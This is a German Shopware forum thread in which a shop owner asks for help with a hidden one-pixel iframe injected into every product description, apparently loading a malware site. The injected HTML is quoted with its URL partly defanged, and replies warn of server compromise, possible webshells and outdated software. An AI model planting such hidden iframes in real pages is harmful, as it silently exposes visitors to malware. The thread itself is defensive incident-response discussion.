walawala MitgliedKommentare: 3 Danke erhalten: 0 Mitglied seit: Dezember 2011

Hallo,

wir haben einen Link zu einer ext. Quelle (Malware) und finden die Ursache nicht. Kann uns jemand sagen, woher der Link kommt und wie wir ihn entfernen können.
Ist auf allen Unterseiten in den Produktinformationen. Ein iframe zu "Dataservice"

Wir können via ftp bislang nichts finden, worin sich die Quelle befindet. Weiß jemand, ob sich evtl. in der Datenbank ein Eintrag befindet?!?

 

<div class="inner_tabs">
<div class="ui-tabs-panel ui-widget-content ui-corner-bottom" id="description">
<h2>Produktinformationen "Schablonierpinsel"</h2>
<p>Der Schablonierpinsel  erleichtert das Ausmalen von Wandschablonen. Mit tupfenden Bewegungen  wird die Farbe aufgebracht und kann daher nicht so leicht unter den Rand  laufen.<br><br><span style="font-weight: bold;">In drei Größen erhältlich:</span><br style="font-weight: bold;"><span style="font-weight: bold;">Größe 8:&nbsp;&nbsp;&nbsp;&nbsp; </span>12mm Durchmesser<span style="font-weight: bold;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><br style="font-weight: bold;"><span style="font-weight: bold;">Größe 12:&nbsp;&nbsp; </span>16mm Durchmesser<span style="font-weight: bold;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><br style="font-weight: bold;"><span style="font-weight: bold;">Größe 16: &nbsp; </span>19mm Durchmessser<span style="font-weight: bold;">&nbsp;&nbsp;&nbsp;&nbsp; </span></p> <p><span style="font-weight: bold;"><br></span></p><iframe name="footer" width="1px" height="1px" src="ht...://www.dataservices.download/login2...." frameborder="0" marginwidth="0" marginheight="0" scrolling="no" allowfullscreen="" style="border:0px #ffffff none;"></iframe>
<div class="space">&nbsp;</div>
<h2><span class="frontend_detail_description shopware_studio_snippet">Weiterführende Links zu</span> "Schablonierpinsel"</h2>
<a class="ico link" href="http://www.wandtattooladen.de/Supplier-wandtattooladen.de_1.html"; target="_parent">
<span class="frontend_detail_description shopware_studio_snippet">Weitere Artikel von wandtattooladen.de</span>
</a>

Vielen Dank vorab für kurze Hilfestellungen!!!

 

 

Antworten

  • waldicomwaldicom MitgliedKommentare: 1018 Danke erhalten: 208 Mitglied seit: September 2011

    Das Ding schient in der Produktbeschriebung zu sein. Einfach diesen Produkt im Backend öffnen, die Beschriebung auf "quelltext" umschalten und prüfen, ob da das ifame irgendwo vorkommt. Wobei der 3.5.x Shop dürfte einige Sicherheitslücken haben. Man sollte sich schon überlegen ein update zu machen.

  • walawala MitgliedKommentare: 3 Danke erhalten: 0 Mitglied seit: Dezember 2011

    Vielen Dank für die Rückmeldung!

    Der Eintrag befindet sich in allen Produkten, daher nicht im Quelltext zu finden. Wir haben die Einträge jetzt via phpmyadmin recht schnell aus der SQL-Datenbank entfernt. Aber die Frage ist nach wie vor, wo in der Datenbank evtl. die Möglichkeit besteht, einen solchen Eintrag für alle Produktinformationen einzutragen, damit wir evtl noch die Quelle ausfindig machen können. Sicherheitslücken können bei dem System wohl bestehen, aber 3.5. hat für uns bei der Artikelkonfig bei über 250.000 Produktvarianten deutliche Performance Vorteile gegenüber den neueren Versionen. Haben das Gleiche auch mit einer aktuellen Shopware Version am laufen. Leider sehr, sehr träge bei solch vielen  Varianten und irgendwann rechnet sich das System zu Tode beim Generieren neuer Artikel.... dieser Shop ist leider nicht updatefähig, zu viel dran rumgebastelt.

  • simklisimkli MitgliedKommentare: 788 Danke erhalten: 281 Mitglied seit: Februar 2014
    Wenn bereits Malware auf dem Shop ist, sollte man diesen schnellstmöglich schließen/offline nehmen, damit keine Kunden Malware erhalten / Daten geklaut werden. Erst wenn er wieder sicher ist, online nehmen. Du setzt deine Kunden hier einer unnötige Gefahr aus. Am besten holst du dir professionelle Hilfe.
  • walawala MitgliedKommentare: 3 Danke erhalten: 0 Mitglied seit: Dezember 2011
    Wenn bereits Malware auf dem Shop ist, sollte man diesen schnellstmöglich schließen/offline nehmen, damit keine Kunden Malware erhalten / Daten geklaut werden. Erst wenn er wieder sicher ist, online nehmen. Du setzt deine Kunden hier einer unnötige Gefahr aus. Am besten holst du dir professionelle Hilfe.

    Es ist keine Malware auf dem Shop, es sind Links in der Produktbeschreibung hinterlegt worden welche zu einer Malware infizierten Seite führen, welche jetzt aber bereits wieder entfernt sind. Vielen Dank aber das war wenig hilfreich.

  • Aquatuning GmbHAquatuning GmbH ModeratorKommentare: 2559 Danke erhalten: 507 Mitglied seit: Juni 2013

    Wenn jmd Zugriff zur Datenbank oder zum FTP hat, dann ist dein Server kompromittiert. Den Link entfernen ist zwar schön und gut - aber das Problem wirst du noch lange nicht los sein. Wenn du nicht den Einstiegspunkt findest und schließt, dann solltest du dringend den Hinweisen von simkli folgen. Zudem wurde möglicherweise bereits an anderer Stelle eine webshell installiert...

    Viele Grüße

  • SebastianKlöpperSebastianKlöpper AdministratorKommentare: 6922 Danke erhalten: 1576 bearbeitet 8. Januar Mitglied seit: Juni 2010

    Scheint wohl mehr im Argen zu liegen.

    Ich kann die Seite so erstmal direkt nicht aufrufen, da Google vor der Seite warnt und eine Seite vorschaltet. Getestet vom iPhone 

    Am Notebook bekam ich von der Antiviren Software auch direkt ne Seite vorgeschaltet mit Warnung. Das auch bei der Startseite, was eigentlich gegen einen reinen link in der Artikelbeschreibung spricht.

    Beides, wenn ich über Google komme. Liegt das Problem schon länger vor?

    Google hat das auf jeden Fall wohl so vermerkt...

    Da muss man zusätzlich noch im Detail den gesamten Seitebquelltext prüfen. Auch jegliche Form von Zugangsdaten müssen direkt von einem sauberen Rechner aus geändert werden. 

    Shopware Zugangsdaten und auch Server sowie Datenbank.

    Dann sollte auch die gesamte Dateibasis auf ggf. schädliche Dateien gescannt werden.

    Das sind nur mal die kurzfristigen ersten Schritte

     

  • SebastianKlöpperSebastianKlöpper AdministratorKommentare: 6922 Danke erhalten: 1576 Mitglied seit: Juni 2010

    Hab gerade nochmal draufgesehen. Quelltext sah so gerade gut aus.

    Alle weiteren Schritte sollten dennoch unternommen werden

Anmelden oder Registrieren, um zu kommentieren.